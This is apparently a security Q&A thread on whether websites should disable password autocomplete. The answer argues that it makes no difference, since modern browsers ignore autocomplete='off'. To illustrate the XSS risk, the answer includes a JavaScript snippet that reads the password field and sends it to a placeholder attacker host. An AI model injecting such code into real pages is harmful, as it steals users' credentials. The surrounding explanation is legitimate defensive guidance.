Should I prevent password autocomplete?

Question

There are lots of replies here on how to prevent password form element autocomplete. My question is should we?

According to the UK government; forcing password resets (something we're often asked to do by clients) describes a net-loss in security and it's actively discouraged.

According to Mozilla; forcing password autocomplete off also suggests a net-loss in security. The UK .gov website doesn't mention this particular practice.

My question:

• Should I attempt to prevent password autocomplete, forcing the user to remember their password, or does the autocomplete provide a net-gain?

// Please cite your sources.

Answer 1

Update: My blog has a proof on concept if you wish to try this out in your browser.

The classic risk of allowing password autocomplete is that any XSS flaw on your website will allow an attacker to grab the password. This is because the browser will autocomplete the password field value, so it will be available in the DOM.

<script>
new Image().src = "//evil.example.com/?password=" + escape(document.getElementById('password').value);
</script>

However, if an attacker can inject a password field themselves in their XSS attack, they could inject one with autocomplete enabled anyway, regardless of the autocomplete setting on your real password field. Classically though, the attribute would prevent the password from being saved in the first place and therefore couldn't be autocompleted in any attack.

As per your Mozilla link, browsers now ignore autocomplete="off":

• if a site sets autocomplete="off" for a form, and the form includes username and password input fields, then the browser will still offer to remember this login, and if the user agrees, the browser will autofill those fields the next time the user visits this page.
• if a site sets autocomplete="off" for username and password input fields, then the browser will still offer to remember this login, and if the user agrees, the browser will autofill those fields the next time the user visits this page.

This is the behavior in Firefox (since version 38), Google Chrome (since 34), and Internet Explorer (since version 11).

Therefore, the answer to your question is "it doesn't make any difference". Additionally, browsers sometimes prompt before completing login credentials, and password managers such as Lastpass can be set to not auto complete fields without the user choosing which login to use first. Some vulnerability scanners (and therefore pentesters relying on these) might raise a low risk issue that autocomplete is enabled on password fields. If so, you should be able to confidently point them in the direction of the Mozilla link. However, one thing to note is that if you are gaining PCI compliance, you may need to still remediate this. Please see my blog post for a more in-depth analysis.